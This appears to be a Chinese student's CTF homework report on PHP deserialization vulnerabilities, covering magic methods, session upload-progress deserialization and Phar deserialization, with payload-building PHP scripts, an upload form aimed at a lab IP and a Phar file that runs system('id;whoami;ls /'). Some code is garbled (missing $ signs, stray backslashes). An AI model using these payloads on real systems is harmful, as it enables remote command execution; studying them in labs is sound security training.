班级作业笔记报告0x09

反序列化漏洞

作业1:

反序列化介绍及魔术方法

包含flag.php文件,GET传参接收select参数,反序列化select值,__desreuct判断password不等于100,等于则结束,不等于则进入下一个判断,下一个判断判断username是否等于admin,等于admin则全局$flag参数,输出flag

构造序列化代码,构造Name类,username和password参数,并且值等于admin和100

<?php

class Name {

public function __construct(username, password) {

this-\>username = username;

this-\>password = password;

}

}

$Name = new Name("admin",100);

echo urlencode(serialize($Name));

?>

序列化后的值为O%3A4%3A%22Name%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A8%3A%22password%22%3Bi%3A100%3B%7D

传参拿到flag

作业2:

反序列化原生类及session反序列化

代码审计

构造PHP序列化代码

<?php

class OowoO{

public $mdzz='system("cat flag.php");';

}

$obj = new OowoO();

echo serialize($obj);

?>

构造POST请求头

<!DOCTYPE html>

<html lang="en" xmlns:http="http://www.w3.org/1999/xhtml">

<head>

<meta charset="UTF-8">

<title>1</title>

</head>

<body>

<form action="http://172.17.0.3/" method="post" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123"/>

<input type="file" name="file"/>

<input type="submit" value="submit"/>

</form>

</body>

</html>

合成请求包,将序列化代码放入filename参数的值中,序列化中有双引号的前面插入反斜杠\,因为PHP以管道符|后面的内容当作序列化字符串进行反序列化

执行cat flag.php命令查看flag,显示在文尾

执行id命令

系统根目录没有flag文件,但是网站根目录有/flag.php文件,可以读一读

作业3:

Phar反序列化

代码审计

GET传参filename参数,接收参数值,利用file_exists()函数反序列化执行eval

需要先用php生成phar文件,php生成phar文件代码,system函数里可选择填入需要执行的命令

<?php

class MyClass{

var $output = 'system("id;whoami;ls /;");';

}

$obj = new MyClass();

// 创建phar包

$phar = new Phar('shell.phar');

$phar->startBuffering();

$phar->setStub('<?php __HALT_COMPILER(); ?>'); // 必须的stub

phar-\>setMetadata(obj); // 写入序列化的MyClass对象

$phar->addFromString('test.txt', 'test'); // 随便加一个文件

$phar->stopBuffering();

?>

更改php.ini文件中phar.readonly属性为phar.readonly = Off,然后命令运行

php a.php

访问upload.html上传shell.phar文件

在首页index.php传参?filename=phar://upload/shell.phar执行命令

个人评价:

反序列化漏洞,我自己认为是每个学网安owasptop10毕业的漏洞,因为他真的很炫,光名字就感到很高级,而且他对代码审计要求也很苛刻,你要理解魔法类,幸好之前死磕过php,不会php的感觉就是千米高空走千米铁索,而且基本上有反序列化漏洞的基本上都会有RCE的存在,本人不是php大佬,并未深入研究反序列化漏洞哈哈

相关推荐
charlie1145141912 小时前
嵌入式Linux驱动开发——模块参数与内核调试:让模块“活“起来的魔法
linux·驱动开发·学习·c
ZzYH222 小时前
文献阅读 260407-Leveraging edge artificial intelligence for sustainable agriculture
笔记
hzxpaipai2 小时前
外贸网站制作:为何派迪科技做的网站性能与打开速度如此不错?
开发语言·前端·网络·科技·安全
青桔柠薯片2 小时前
I²C 总线协议学习总结:从开漏逻辑到读写事务的工程视角
c语言·开发语言·学习
正在努力的网络架构师2 小时前
安全服务:WAF/HSS
安全·云网络
CHICX12292 小时前
3.SQL 注入之高权限注入(上):从权限原理到跨库攻击,吃透 root 权限注入的危害与防御
web安全·网络安全
m0_738120722 小时前
渗透基础知识ctfshow——Web应用安全与防护(第二章)
服务器·前端·安全·web安全·php
AI_零食2 小时前
开源鸿蒙跨平台Flutter开发:生物力学与力量周期-臂力训练矩阵架构
学习·flutter·ui·华为·矩阵·开源·harmonyos
无忧智库2 小时前
医疗保障信息平台安全体系:从“合规堆砌”到“内生安全”的实战化重构(PPT)
安全·重构